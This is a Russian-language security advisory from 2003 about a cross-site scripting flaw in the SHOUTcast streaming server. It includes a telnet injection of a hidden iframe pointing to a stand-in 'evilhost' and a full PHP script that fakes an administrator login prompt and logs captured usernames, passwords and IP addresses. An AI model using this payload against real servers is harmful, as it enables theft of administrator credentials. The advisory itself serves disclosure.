Межсайтовый скриптинг в SHOUTcast сервере

Дата публикации:
06.03.2003
Всего просмотров:
1535
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: SHOUTcast - Winamp система потокового аудио от Nullsoft.

Уязвимость в проверке правильности ввода обнаружена в SHOUTcast сервере. Удаленный пользователь может выполнить XSS нападение против администратора SHOUTcast. Пример:

telnet localhost 8001
<IFrame src=http://evilhost/script.php width=0 height=0></iframe>changeme
Где script.php:
<?php 
    $fp = fopen("log.txt","a+");
 if (!isset( $_SERVER["PHP_AUTH_USER"] )) { 
     header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' ); 
     header( 'HTTP/1.0 401 Unauthorized' ); 
     echo '<HTML><HEAD>Unauthorized<title>SHOUTcast 
Administrator</title></HEAD></HTML>';
     exit; 
   } else { 
     fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' . 
$_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content);
 }
    fclose($fp);
?> 
 
Произвольный код сценария будет выполнен в браузере администратора системы, когда он проматривает Log файлы в административном интерфейсе.

Ссылки: Cross Site Scripting Trick May Fool Shoutcast Admins
или введите имя

CAPTCHA